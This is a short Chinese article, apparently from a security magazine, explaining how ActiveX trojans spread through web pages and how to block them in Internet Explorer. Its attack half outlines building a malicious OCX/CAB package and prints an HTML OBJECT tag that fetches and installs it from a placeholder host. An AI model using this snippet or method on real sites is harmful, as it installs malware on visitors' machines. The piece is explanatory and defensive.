剖析ActiveX挂马：以安装名义入侵

方法2：编写ActiveX木马

攻

ActiveX木马是利用一些用户盲目地点击网页上弹出的ActiveX询问安装按钮的习惯而进行传播的。许多用户往往并不能够分辨出哪些ActiveX控件是无害的，哪些ActiveX控件是有害的。

那些ActiveX木马会打着视频聊天、美女图库等诱惑性的幌子，一些经不起诱惑的用户就会冲动性地安装网页中的ActiveX木马。

编写ActiveX木马，需要一定的编程基础，而且整个过程相当复杂，由于版面的原因，这里只向各位想成为安全工程师的朋友简单阐述一下ActiveX木马的大致编写过程。

首先黑客会编写一个具有Download或者其他恶意功能的OCX控件，这是ActiveX木马的核心和灵魂，然后黑客会再编写一个Setup安全设置的INF文件，用CAB压缩工具，例如WinCAB，将两个文件压缩打包成一个CAB文件。

最后黑客将该文件上传到自己的网站中，并在网页中写入调用安装ActiveX控件的代码即可开张等待浏览该网页的用户上钩。

调用代码如下：

<OBJECT classid=clsid:68ADAF59-76C1-4561-A45A-867F43545237
codeBase=http://192.168.1.1/web/setup.cab#version=1，0，0，0>
<PARAM NAME="Setup" VALUE="http:// 192.168.1.1/web/download.ocx">
</OBJECT>

这样的ActiveX木马是没有签名验证的，通常不会被允许安装，但是仍然有方法可以突破这些安全限制。

防

要避免ActiveX木马的攻击只要禁止ActiveX木马被调用运行就可以了。

防范此种方式挂马的最好方法还是在客户终端机上操作，在客户终端机运行IE浏览器，点击“工具→Internet选项→安全→自定义级别”，将 安全级别定义为“高”，对“ActiveX控件和插件”中第2项、第3项设置为“禁用”，其他项设置为“提示”，之后点击“确定”。这样设置后，当你使用 IE浏览网页时，就能有效避免ActiveX木马的攻击。